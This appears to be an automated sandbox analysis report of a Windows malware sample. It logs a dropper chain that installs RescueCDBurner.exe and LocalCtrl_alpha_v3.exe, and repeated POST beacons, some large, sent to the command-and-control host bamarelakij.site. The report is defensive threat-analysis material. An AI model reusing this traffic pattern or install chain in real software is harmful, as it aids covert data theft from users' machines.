2025-01-09 13:43:04 UTC | 434 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 35
Host: bamarelakij.site
2025-01-09 13:43:04 UTC | 35 | OUT | Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
2025-01-09 13:43:04 UTC | 730 | IN | HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:43:04 GMT
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aHwB%2Bdk%2B%2F526xuYdjAj36RXKLvIR3HGHWupaTrSSNsBjjIm9y8myOkB4Vgk5%2BaqCIdrkS7hZ4NjFcaDwjFf7s9QYbTCYggUxR4FWsnaXXBlWFby25nrCu%2BbzPJQ0BgM4OXD9"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4daac1eef1875-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1638&rtt_var=702&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1105&delivery_rate=1465863&cwnd=153&unsent_bytes=0&cid=03e2382adf8820b9&ts=327&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.7 | 50091 | 104.21.80.52 | 443 | 3824 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:43:09 UTC | 438 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 132728
Host: bamarelakij.site
2025-01-09 13:43:09 UTC | 731 | IN | HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:43:09 GMT
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tFymu3iIrPd5ACL0WLxlIgzR8%2FTHdEyQLmhVgORpADIzxi0KlxwpWyxaYnI3ePJIMZX4lSgSub9ac3PRnxgVSKEshM%2B7SQBGP9SVnVKmr7Wey2U9foySNrNA5ObDkG%2F1MAq0"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4dac9ce4eef9f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1761&rtt_var=672&sent=52&recv=140&lost=0&retrans=0&sent_bytes=2839&recv_bytes=134176&delivery_rate=1613259&cwnd=219&unsent_bytes=0&cid=3ed609e07b8bb222&ts=561&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.7 | 50092 | 104.21.80.52 | 443 | 3824 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:43:10 UTC | 435 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 745
Host: bamarelakij.site
2025-01-09 13:43:10 UTC | 729 | IN | HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:43:10 GMT
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZJ9lClkeREZ%2FTMYZLt5ZGSNWTuguAqpfcwk7idz2v%2FQY2VFXv3El99gf6FIkpNAJ8Vz%2Bzcf5XQswO%2BuWdJcgLLMMgejvJFXy82MGnYB221JmOMVN1tXIH64FG%2FM9HkiPigHG"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4dad068471875-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1657&rtt_var=828&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4216&recv_bytes=1816&delivery_rate=314079&cwnd=153&unsent_bytes=0&cid=848c10e941978e29&ts=474&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.7 | 50093 | 104.21.80.52 | 443 | 3824 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:43:10 UTC | 435 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 212
Host: bamarelakij.site
2025-01-09 13:43:11 UTC | 731 | IN | HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:43:11 GMT
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LzV5ts2nild6pwNOyA%2FAaOaLUtTqg1%2FgyhtKQaHMgUiBOFgnmzTHsfnBj60DVBd%2FjASV7RiJ9K8OgP12soqn3982lrpjeKjh%2BUgoUgaM%2FrVaYY5OcFh7GoOYNkYmJolB%2BPSO"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4dad629bc0c7c-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1603&rtt_var=625&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1283&delivery_rate=1716637&cwnd=76&unsent_bytes=0&cid=de39bfd61285a511&ts=323&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.7 | 50094 | 104.21.80.52 | 443 | 3824 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:43:11 UTC | 435 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 380
Host: bamarelakij.site
2025-01-09 13:43:12 UTC | 728 | IN | HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:43:12 GMT
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OyGednSjdHpZvxu2o28tozTPiDJrwYkeLGHeVGE0LSC1RoZrn0g8iBWGOYd7UmWnznehl%2BZV%2BjN%2F0F2GHp261uRVxDfkSB5m%2F5f1wCfu8Hhh5Gx1Otxm8OinbfVTwruZBCdk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4dadb29447287-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1871&min_rtt=1867&rtt_var=709&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1451&delivery_rate=1533613&cwnd=191&unsent_bytes=0&cid=9bcc5ce941c65cfb&ts=338&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.7 | 50095 | 104.21.80.52 | 443 | 3824 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:43:12 UTC | 436 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 9953
Host: bamarelakij.site
2025-01-09 13:43:12 UTC | 734 | IN | HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:43:12 GMT
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yhv5PbCvVP%2FJ5eaxO4ykjhR%2B7Qch4R9sZ9pl%2Bhdm3OmOj51LV9s9QKSvaW7ls73agaVkvaVzmf1TwkRFFiv0tz16M%2FG%2BINL6o4%2F6yhMUGCLETPKlh953rXreJIwOd3mjK50J"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4dae02bd57c78-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1790&rtt_var=682&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2838&recv_bytes=11047&delivery_rate=1593016&cwnd=252&unsent_bytes=0&cid=f2b0225bdc20e713&ts=346&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.7 | 50096 | 104.21.80.52 | 443 | 3824 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:43:13 UTC | 437 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 70017
Host: bamarelakij.site
2025-01-09 13:43:14 UTC | 733 | IN | HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:43:13 GMT
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBZUJeNh5eRGf6vuI%2BDoUhJovCjz%2BCR8Z7JBt2P0BUQtvRm35Bd50xYIG8zVJ3wI5QBpyixZz%2FnxsZQ3y8H7iN21A4I5WR7ltgO2%2BIQRpDQFmBd3%2FOBctiVrytnFcxbCX2sA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4dae5df06c477-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1776&rtt_var=682&sent=29&recv=76&lost=0&retrans=0&sent_bytes=2837&recv_bytes=71288&delivery_rate=1644144&cwnd=181&unsent_bytes=0&cid=453d1a2fdcd818d1&ts=518&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.7 | 50097 | 104.21.80.52 | 443 | 3824 | C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 13:43:14 UTC | 434 | OUT | POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 35
Host: bamarelakij.site
2025-01-09 13:43:14 UTC | 35 | OUT | Data Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Data Ascii: (no printable characters)
2025-01-09 13:43:14 UTC | 724 | IN | HTTP/1.1 204 No Content
Date: Thu, 09 Jan 2025 13:43:14 GMT
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L3zgWoAzF09VR6uikAmbZc9dWwc5ue8TbbCDxNLknrFCtHrZiyNqWbFXfi0RRKqOzX6QZ76SIZ5gr3iEZUnCzAPZYZoeHDCP3VqCWIhNb7QdYGPybMgqDAmBCZ%2FbgOQkSI3%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff4daec39c89e08-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1809&rtt_var=684&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1105&delivery_rate=1592148&cwnd=163&unsent_bytes=0&cid=fe2673305668b541&ts=239&x=0"


                                                                                                                                                                Target ID:1
                                                                                                                                                                Start time:08:41:29
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Users\user\Desktop\kXzODlqJak.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\kXzODlqJak.exe"
                                                                                                                                                                Imagebase:0x910000
                                                                                                                                                                File size:14'323'584 bytes
                                                                                                                                                                MD5 hash:AB79EAFCCE0D6EFF856B259977E480E1
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:2
                                                                                                                                                                Start time:08:41:29
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Windows\TEMP\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652
                                                                                                                                                                Imagebase:0x160000
                                                                                                                                                                File size:14'302'064 bytes
                                                                                                                                                                MD5 hash:2C6652F7E01283DE091B5200B7878E69
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 29%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:3
                                                                                                                                                                Start time:08:41:31
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Windows\Temp\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\TEMP\{356F9AEC-B15C-48B6-BD78-2E5ADB4A77D5}\.ba\RescueCDBurner.exe
                                                                                                                                                                Imagebase:0x5c0000
                                                                                                                                                                File size:6'487'736 bytes
                                                                                                                                                                MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:4
                                                                                                                                                                Start time:08:41:33
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:6'487'736 bytes
                                                                                                                                                                MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:5
                                                                                                                                                                Start time:08:41:34
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:6
                                                                                                                                                                Start time:08:41:34
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:8
                                                                                                                                                                Start time:08:42:01
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe"
                                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                                File size:6'487'736 bytes
                                                                                                                                                                MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:9
                                                                                                                                                                Start time:08:42:01
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:10
                                                                                                                                                                Start time:08:42:02
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                File size:2'364'728 bytes
                                                                                                                                                                MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                Reputation:moderate
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:11
                                                                                                                                                                Start time:08:42:02
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

Target ID: 12
Start time: 08:42:20
Start date: 09/01/2025
Path: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Wow64 process (32bit): false
Commandline: C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Imagebase: 0x140000000
File size: 2'364'728 bytes
MD5 hash: 967F4470627F823F4D7981E511C9824F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 15
Start time: 08:42:26
Start date: 09/01/2025
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Imagebase: 0x7ff7fb980000
File size: 4'210'216 bytes
MD5 hash: 69222B8101B0601CC6663F8381E7E00F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 08:42:27
Start date: 09/01/2025
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase: 0x7ff7fb980000
File size: 4'210'216 bytes
MD5 hash: 69222B8101B0601CC6663F8381E7E00F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 17
Start time: 08:42:27
Start date: 09/01/2025
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2180,i,768463352532878709,16600556330849448278,262144 /prefetch:3
Imagebase: 0x7ff7fb980000
File size: 4'210'216 bytes
MD5 hash: 69222B8101B0601CC6663F8381E7E00F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 08:42:28
Start date: 09/01/2025
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2904 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:3
Imagebase: 0x7ff7fb980000
File size: 4'210'216 bytes
MD5 hash: 69222B8101B0601CC6663F8381E7E00F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 24
Start time: 08:42:33
Start date: 09/01/2025
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7096 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
Imagebase: 0x7ff7fb980000
File size: 4'210'216 bytes
MD5 hash: 69222B8101B0601CC6663F8381E7E00F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 08:42:33
Start date: 09/01/2025
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5304 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
Imagebase: 0x7ff7fb980000
File size: 4'210'216 bytes
MD5 hash: 69222B8101B0601CC6663F8381E7E00F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 08:43:28
Start date: 09/01/2025
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7120 --field-trial-handle=2620,i,15719151116728228039,7343282763489968008,262144 /prefetch:8
Imagebase: 0x7ff7fb980000
File size: 4'210'216 bytes
MD5 hash: 69222B8101B0601CC6663F8381E7E00F
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false


Execution Graph

Execution Coverage: 4.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 8.5%
Total number of Nodes: 1932
Total number of Limit Nodes: 55
execution_graph: node and edge listing of the interactive execution graph viewer (function addresses, API-call counts and call edges between nodes); the raw listing is not reproduced here.
